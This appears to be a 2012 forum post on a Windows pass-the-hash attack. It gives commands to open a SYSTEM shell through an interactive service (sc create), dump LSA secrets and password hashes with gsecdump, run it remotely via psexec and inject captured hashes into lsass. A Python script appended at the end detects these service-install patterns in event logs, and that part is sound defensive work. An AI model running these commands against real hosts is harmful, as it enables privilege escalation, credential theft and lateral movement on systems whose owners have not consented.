Hash injection attack
Posted on 2012-11-6 21:09:29
To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools package to load the hash information just captured with gsecdump into the local lsass process, which achieves the hash injection attack. The foreigners really are good at this; administrators will have their hands full now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, actually don't need to be cracked at all; this is just using the tools. As the original article puts it well: whether the password is 4 characters or 127, once you have the hash it's 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I looked at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
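As an added defensive example (not part of the original post or the linked blog), the Python check below scans Windows System event log records for the two service-install patterns that appear in the transcript above: an Event ID 7045 whose image path launches cmd.exe as an interactive service, and the PsExec helper service (PsExec's `-s` run installs a service named PSEXESVC). The log lines are constructed samples, and the `key=value` export layout is an assumption for the example, not a real Windows export format.

```python
import re

# Constructed sample records (not from a real host). Event ID 7045 is
# "A service was installed in the system"; 7036 is a state change.
SAMPLE_LOG = r'''
EventID=7045 ServiceName=shellcmdline ImagePath="C:\WINDOWS\system32\cmd.exe /K start" ServiceType="interactive, own process" StartType="demand start" Account=LocalSystem
EventID=7045 ServiceName=PSEXESVC ImagePath="C:\WINDOWS\PSEXESVC.exe" ServiceType="user mode service" StartType="demand start" Account=LocalSystem
EventID=7045 ServiceName=Spooler ImagePath="C:\WINDOWS\system32\spoolsv.exe" ServiceType="user mode service" StartType="auto start" Account=LocalSystem
EventID=7036 ServiceName=shellcmdline State=stopped
'''

# key=value pairs; quoted values may contain spaces (assumed layout).
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

SHELL_BINARIES = ("cmd.exe", "command.com", "powershell.exe")

FINDING_SHELL = "shell binary installed as a service"
FINDING_INTERACTIVE = "interactive service type"
FINDING_PSEXEC = "PsExec service (PSEXESVC)"


def parse_record(line: str) -> dict:
    """Turn one log line into a dict of its fields."""
    return {k: (q if q else u) for k, q, u in FIELD_RE.findall(line)}


def classify_service_install(rec: dict) -> list:
    """Return findings for a 7045 record; an empty list means nothing flagged."""
    if rec.get("EventID") != "7045":
        return []
    findings = []
    image = rec.get("ImagePath", "").lower()
    name = rec.get("ServiceName", "").lower()
    if any(binary in image for binary in SHELL_BINARIES):
        findings.append(FINDING_SHELL)
    if "interactive" in rec.get("ServiceType", "").lower():
        findings.append(FINDING_INTERACTIVE)
    if name == "psexesvc" or "psexesvc" in image:
        findings.append(FINDING_PSEXEC)
    return findings


def scan_log(text: str) -> list:
    """Return (service name, findings) for every flagged record in the log."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_record(line)
        findings = classify_service_install(rec)
        if findings:
            hits.append((rec.get("ServiceName", "?"), findings))
    return hits
```

Running `scan_log(SAMPLE_LOG)` flags `shellcmdline` (shell binary, interactive type) and `PSEXESVC`, and leaves the legitimate Spooler install alone.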